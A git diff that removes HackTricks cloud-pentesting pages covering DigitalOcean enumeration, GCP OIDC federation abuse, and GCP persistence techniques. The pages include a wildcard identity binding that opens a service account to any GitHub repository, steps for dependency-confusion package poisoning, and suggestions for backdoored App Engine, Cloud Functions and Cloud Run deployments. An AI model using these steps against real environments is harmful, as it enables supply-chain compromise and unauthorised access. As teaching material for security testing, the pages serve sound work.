-{% endhint %} - -## Basic Information - -> project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\ -> For more info check: - -{% content-ref url="../do-basic-information.md" %} -[do-basic-information.md](../do-basic-information.md) -{% endcontent-ref %} - -### Enumeration - -It's possible to **enumerate all the projects a user have access to** and all the resources that are running inside a project very easily: - -```bash -doctl projects list # Get projects -doctl projects resources list # Get all the resources of a project -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md deleted file mode 100644 index a19a48b8f..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md +++ /dev/null @@ -1,72 +0,0 @@ -# DO - Spaces - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Spaces are **object storage services**. They allow users to **store and serve large amounts of data**, such as images and other files, in a scalable and cost-effective way. Spaces can be accessed via the DigitalOcean control panel, or using the DigitalOcean API, and are integrated with other DigitalOcean services such as Droplets (virtual private servers) and Load Balancers. - -### Access - -Spaces can be **public** (anyone can access them from the Internet) or **private** (only authorised users). To access the files from a private space outside of the Control Panel, we need to generate an **access key** and **secret**. These are a pair of random tokens that serve as a **username** and **password** to grant access to your Space. - -A **URL of a space** looks like this: **`https://uniqbucketname.fra1.digitaloceanspaces.com/`**\ -Note the **region** as **subdomain**. - -Even if the **space** is **public**, **files** **inside** of it can be **private** (you will be able to access them only with credentials). - -However, **even** if the file is **private**, from the console it's possible to share a file with a link such as `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115def975bc` for a period of time: - -
- -### Enumeration - -```bash -# Unauthenticated -## Note how the region is specified in the endpoint -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com --no-sign-request s3://uniqbucketname - -# Authenticated -## Configure spaces keys as AWS credentials -aws configure -AWS Access Key ID [None]: -AWS Secret Access Key [None]: -Default region name [None]: -Default output format [None]: - -## List all buckets in a region -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com - -## List files inside a bucket -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname - -## It's also possible to generate authorized access to buckets from the API -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md deleted file mode 100644 index ce5d000ad..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md +++ /dev/null @@ -1,41 +0,0 @@ -# DO - Volumes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean volumes are **block storage** devices that can be **attached to and detached from Droplets**. Volumes are useful for **storing data** that needs to **persist** independently of the Droplet itself, such as databases or file storage. They can be resized, attached to multiple Droplets, and snapshot for backups. - -### Enumeration - -``` -compute volume list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md b/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md deleted file mode 100644 index 0f902f914..000000000 --- a/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md +++ /dev/null @@ -1,181 +0,0 @@ -# GCP - Federation Abuse - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## OIDC - Github Actions Abuse - -### GCP - -In order to give **access to the Github Actions** from a Github repo to a GCP **service account** the following steps are needed: - -* **Create the Service Account** to access from github actions with the **desired permissions:** - -```bash -projectId=FIXME -gcloud config set project $projectId - -# Create the Service Account -gcloud iam service-accounts create "github-demo-sa" -saId="github-demo-sa@${projectId}.iam.gserviceaccount.com" - -# Enable the IAM Credentials API -gcloud services enable iamcredentials.googleapis.com - -# Give permissions to SA - -gcloud projects add-iam-policy-binding $projectId \ - --member="serviceAccount:$saId" \ - --role="roles/iam.securityReviewer" -``` - -* Generate a **new workload identity pool**: - -```bash -# Create a Workload Identity Pool -poolName=wi-pool - -gcloud iam workload-identity-pools create $poolName \ - --location global \ - --display-name $poolName - -poolId=$(gcloud iam workload-identity-pools describe $poolName \ - --location global \ - --format='get(name)') -``` - -* Generate a new **workload identity pool OIDC provider** that **trusts** github actions (by org/repo name in this scenario): - -```bash -attributeMappingScope=repository # could be sub (GitHub repository and branch) or repository_owner (GitHub organization) - -gcloud iam workload-identity-pools providers create-oidc $poolName \ - --location global \ - --workload-identity-pool $poolName \ - --display-name $poolName \ - --attribute-mapping "google.subject=assertion.${attributeMappingScope},attribute.actor=assertion.actor,attribute.aud=assertion.aud,attribute.repository=assertion.repository" \ - --issuer-uri "https://token.actions.githubusercontent.com" - -providerId=$(gcloud iam workload-identity-pools providers describe $poolName \ - --location global \ - --workload-identity-pool $poolName \ - --format='get(name)') -``` - -* Finally, **allow the principal** from the provider to use a 
service principal: - -```bash -gitHubRepoName="repo-org/repo-name" -gcloud iam service-accounts add-iam-policy-binding $saId \ - --role "roles/iam.workloadIdentityUser" \ - --member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}" -``` - -{% hint style="warning" %} -Note how in the previous member we are specifying the **`org-name/repo-name`** as conditions to be able to access the service account (other params that makes it **more restrictive** like the branch could also be used). - -However it's also possible to **allow all github to access** the service account creating a provider such the following using a wildcard: -{% endhint %} - -
# Create a Workload Identity Pool
-poolName=wi-pool2
-
-gcloud iam workload-identity-pools create $poolName \
-  --location global \
-  --display-name $poolName
-
-poolId=$(gcloud iam workload-identity-pools describe $poolName \
-  --location global \
-  --format='get(name)')
-
-gcloud iam workload-identity-pools providers create-oidc $poolName \
-  --project="${projectId}" \
-  --location="global" \
-  --workload-identity-pool="$poolName" \
-  --display-name="Demo provider" \
-  --attribute-mapping="google.subject=assertion.sub,attribute.actor=assertion.actor,attribute.aud=assertion.aud" \
-  --issuer-uri="https://token.actions.githubusercontent.com"
-
-providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
-  --location global \
-  --workload-identity-pool $poolName \
-  --format='get(name)')
-
-# CHECK THE WILDCARD
-gcloud iam service-accounts add-iam-policy-binding "${saId}" \
-  --project="${projectId}" \
-  --role="roles/iam.workloadIdentityUser" \
-  --member="principalSet://iam.googleapis.com/${poolId}/*"
-
- -{% hint style="warning" %} -In this case anyone could access the service account from github actions, so it's important always to **check how the member is defined**.\ -It should be always something like this: - -`attribute.{custom_attribute}`:`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` -{% endhint %} - -### Github - -Remember to change **`${providerId}`** and **`${saId}`** for their respective values: - -```yaml -name: Check GCP action -on: - workflow_dispatch: - pull_request: - branches: - - main - -permissions: - id-token: write - -jobs: - Get_OIDC_ID_token: - runs-on: ubuntu-latest - steps: - - id: 'auth' - name: 'Authenticate to GCP' - uses: 'google-github-actions/auth@v2.1.3' - with: - create_credentials_file: 'true' - workload_identity_provider: '${providerId}' # In the providerId, the numerical project ID (12 digit number) should be used - service_account: '${saId}' # instead of the alphanumeric project ID. ex: - activate_credentials_file: true # projects/123123123123/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider' - - id: 'gcloud' - name: 'gcloud' - run: |- - gcloud config set project - gcloud config set account '${saId}' - gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}" - gcloud auth list - gcloud projects list - gcloud secrets list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md deleted file mode 100644 index d94452728..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - API Keys Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## API Keys - -For more information about API Keys check: - -{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} -[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md) -{% endcontent-ref %} - -### Create new / Access existing ones - -Check how to do this in: - -{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %} -[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md deleted file mode 100644 index ef9829d83..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - App Engine Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Engine - -For more information about App Engine check: - -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} - -### Modify code - -If yoi could just modify the code of a running version or create a new one yo could make it run your backdoor and mantain persistence. - -### Old version persistence - -**Every version of the web application is going to be run**, if you find that an App Engine project is running several versions, you could **create a new one** with your **backdoor** code, and then **create a new legit** one so the last one is the legit but there will be a **backdoored one also running**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md deleted file mode 100644 index 234708928..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md +++ /dev/null @@ -1,67 +0,0 @@ -# GCP - Artifact Registry Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### Dependency Confusion - -* What happens if a **remote and a standard** repositories **are mixed in a virtual** one and a package exists in both? - * The one with the **highest priority set in the virtual repository** is used - * If the **priority is the same**: - * If the **version** is the **same**, the **policy name alphabetically** first in the virtual repository is used - * If not, the **highest version** is used - -{% hint style="danger" %} -Therefore, it's possible to **abuse a highest version (dependency confusion)** in a public package registry if the remote repository has a higher or same priority -{% endhint %} - -This technique can be useful for **persistence** and **unauthenticated access** as to abuse it it just require to **know a library name** stored in Artifact Registry and **create that same library in the public repository (PyPi for python for example)** with a higher version. - -For persistence these are the steps you need to follow: - -* **Requirements**: A **virtual repository** must **exist** and be used, an **internal package** with a **name** that doesn't exist in the **public repository** must be used. -* Create a remote repository if it doesn't exist -* Add the remote repository to the virtual repository -* Edit the policies of the virtual registry to give a higher priority (or same) to the remote repository.\ - Run something like: - * [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file) -* Download the legit package, add your malicious code and register it in the public repository with the same version. 
Every time a developer installs it, he will install yours! - -For more information about dependency confusion check: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/dependency-confusion" %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md deleted file mode 100644 index 6aa03016c..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - BigQuery Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## BigQuery - -For more information about BigQuery check: - -{% content-ref url="../gcp-services/gcp-bigquery-enum.md" %} -[gcp-bigquery-enum.md](../gcp-services/gcp-bigquery-enum.md) -{% endcontent-ref %} - -### Grant further access - -Grant further access over datasets, tables, rows and columns to compromised users or external users. Check the privileges needed and how to do this in the page: - -{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %} -[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md deleted file mode 100644 index 193e168de..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md +++ /dev/null @@ -1,45 +0,0 @@ -# GCP - Cloud Functions Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Functions - -For more info about Cloud Functions check: - -{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} -[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md) -{% endcontent-ref %} - -### Persistence Techniques - -* **Modify the code** of the Cloud Function, even just the `requirements.txt` -* **Allow anyone** to call a vulnerable Cloud Function or a backdoor one -* **Trigger** a Cloud Function when something happens to infect something - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md deleted file mode 100644 index 909237bdd..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - Cloud Run Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -For more information about Cloud Run check: - -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} - -### Backdoored Revision - -Create a new backdoored revision of a Run Service and split some traffic to it. - -### Publicly Accessible Service - -Make a Service publicly accessible - -### Backdoored Service or Job - -Create a backdoored Service or Job - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md deleted file mode 100644 index 5f7960285..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md +++ /dev/null @@ -1,98 +0,0 @@ -# GCP - Cloud Shell Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
